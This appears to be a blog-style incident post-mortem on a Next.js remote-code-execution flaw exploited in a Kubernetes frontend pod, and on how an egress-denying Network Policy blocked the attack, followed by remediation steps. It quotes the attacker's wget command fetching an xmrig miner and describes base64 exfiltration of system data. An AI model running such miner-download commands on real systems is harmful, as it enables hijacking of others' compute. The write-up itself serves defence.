Next.js RCE in Production: How the Attack Unfolded and What Stopped It
A manually deployed image with a downgraded Next.js version was exploited via GHSA-9qr9-h5gf-34mp within hours of deployment; a pre-existing Network Policy denying internet egress prevented the attacker from downloading xmrig and completing the compromise.
ON THIS PAGE
Incident 1007418. On March 16, 2026, the frontend pod began executing system commands. The trigger was a downgraded Next.js package. The CVE had been published. The exploit was already automated.
Environment
| Component | Detail |
|---|---|
| Cluster | AKS (<cluster>), West Europe |
| Affected pod | <core-system>-frontend, namespaces <namespace>-dev and <namespace>-prod |
| Vulnerable image | <acr-registry>.azurecr.io/<core-system>-frontend:20260313-081305 |
| Next.js version | 15.2.4 (vulnerable) — downgraded from 15.2.6 |
| CVE | GHSA-9qr9-h5gf-34mp |
How the vulnerability got in
The March 13 manual build pulled the latest <core-system>-frontend-dev branch. That branch had a dependency downgrade:
- "next": "15.2.6"
+ "next": "15.2.4"
The downgrade happened in a PR that passed code review. The reason was a rendering regression in 15.2.6 that hadn’t been triaged yet. 15.2.4 was the last known-good version. The build went out without a Trivy scan — the pipeline was bypassed for the manual deployment, and no scan was run manually.
GHSA-9qr9-h5gf-34mp is a Remote Code Execution vulnerability in the React server actions flight protocol. Next.js 15.2.4 is in the affected range. The patch was in 15.2.5 and above.
What the attacker did
The first alert came from process monitoring. The frontend pod was running:
/usr/bin/wget -q https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-linux-x64.tar.gz
Standard xmrig delivery. The wget command is what automated scanners fire when they find an RCE — download a miner, make it executable, run it. The image was node:18-debian at the time, which includes wget as part of the Debian base.
Alongside the wget attempt, forensic examination of the pod showed zombie processes:
[sh] <defunct>
[base64] <defunct>
The base64 zombie indicated the attacker was already exfiltrating system information — encoding the output of system commands and sending it out as a digest field in HTTP requests. Decoding one such payload:
top - 04:14:07 up 16:35, 0 user, load average: 0.03, 0.10, 0.21
Tasks: 17 total, 1 running, 5 sleeping, 0 stopped, 11 zombie
System metrics only. No application data, no database credentials, no secrets. The pod’s filesystem access was read-only and its environment variables included secrets mounted via ExternalSecret — but the attacker never read them. The exfiltration was scoping the system before attempting the full compromise.
Why the download failed
The frontend Network Policy allows two outbound paths:
egress:
# DNS via CoreDNS
- to:
- namespaceSelector:
matchLabels:
kubernetes.io/metadata.name: kube-system
ports:
- protocol: UDP
port: 53
# Backend communication only
- to:
- podSelector:
matchLabels:
app: <core-system>-backend
ports:
- protocol: TCP
port: 3000
No outbound HTTP or HTTPS. The wget to github.com had no egress path. The TCP connection attempt timed out. The xmrig binary was never downloaded.
This was not a lucky break. The Network Policy was intentional — it had been applied during the Kinsing incident in December specifically because internet egress from the frontend pod has no legitimate business purpose. The frontend calls the backend; the backend calls external APIs. The frontend itself should never initiate outbound internet connections.
Immediate response
# Scale to zero to stop any further execution
kubectl scale deployment <core-system>-frontend -n <namespace>-dev --replicas=0
kubectl scale deployment <core-system>-frontend -n <namespace>-prod --replicas=0
# Delete compromised pods (force-terminate)
kubectl delete pod -l app=<core-system>-frontend -n <namespace>-dev --force
kubectl delete pod -l app=<core-system>-frontend -n <namespace>-prod --force
The nodes were left running. The compromise was contained to the pod — readOnlyRootFilesystem: true had prevented any writes to the node’s filesystem, and the attack didn’t escape the container boundary.
Remediation
Step 1: Patch Next.js
sed -i 's/"next": "15.2.4"/"next": "15.2.6"/' package.json
npm install
Step 2: Rebuild with the hardened image
The Dockerfile.secure had already been created after the December incident. It uses node:20-alpine which has no wget, no curl, and no Debian toolchain:
FROM node:20-alpine AS builder
WORKDIR /app
COPY package*.json ./
RUN npm ci
COPY . .
ARG NEXT_PUBLIC_API_URL=/api
ENV NEXT_PUBLIC_API_URL=${NEXT_PUBLIC_API_URL}
RUN npm run build
FROM node:20-alpine AS runner
WORKDIR /app
RUN addgroup -g 1001 nodejs && adduser -S -u 1001 nextjs
COPY --from=builder --chown=nextjs:nodejs /app/.next/standalone ./
COPY --from=builder --chown=nextjs:nodejs /app/public ./public
USER nextjs
EXPOSE 3000
CMD ["node", "server.js"]
docker build \
--build-arg NEXT_PUBLIC_API_URL=/api \
--no-cache \
-f Dockerfile.secure \
-t <acr-registry>.azurecr.io/<core-system>-frontend:20260316-071706 \
.
docker push <acr-registry>.azurecr.io/<core-system>-frontend:20260316-071706
Step 3: Redeploy
kubectl set image deployment/<core-system>-frontend \
<core-system>-frontend=<acr-registry>.azurecr.io/<core-system>-frontend:20260316-071706 \
-n <namespace>-dev
kubectl set image deployment/<core-system>-frontend \
<core-system>-frontend=<acr-registry>.azurecr.io/<core-system>-frontend:20260316-071706 \
-n <namespace>-prod
kubectl rollout status deployment/<core-system>-frontend -n <namespace>-prod
# deployment "<core-system>-frontend" successfully rolled out
Post-deployment: 0 restarts across 48 hours. No further alerts.
What the scan found on the vulnerable image
Running Trivy against the image that was in production during the attack:
| Package | CVE | Severity |
|---|---|---|
next@15.2.4 | GHSA-9qr9-h5gf-34mp | CRITICAL — RCE |
form-data | CVE-2025-7783 | CRITICAL — unsafe random |
axios | CVE-2025-58754 | HIGH — DoS |
cross-spawn | CVE-2024-21538 | HIGH — ReDoS |
glob | CVE-2025-64756 | HIGH — command injection |
Two CRITICAL vulnerabilities in the image that shipped. Neither was caught because no scan was run.
What changed after this
Every manual deployment now requires:
- A named approver (was: none required)
npm audit --audit-level=criticalbefore building- Trivy scan of the built image before push
- Both checks logged in the deployment record
The pipeline already ran Trivy. The gap was the manual path — which is exactly what gets used when things are urgent and steps get skipped.
The latest tag was also retired. Every image now carries an environment suffix (-uat, -prod) so it’s unambiguous what is running where:
<acr-registry>.azurecr.io/<core-system>-frontend:20260316-071706 # clean build
<acr-registry>.azurecr.io/<core-system>-backend:20260317-143958-prod # env-tagged
The chain that led here
- Dependency downgrade in a PR — motivated by a real regression, not negligence
- Manual deployment that bypassed the pipeline — justified by urgency
- No scan on the manual path — process gap, not tool gap
- CVE already exploited in the wild — attackers scan for newly-deployed vulnerable versions
Any one of these is manageable. All four together, in sequence, is an incident.
Discussion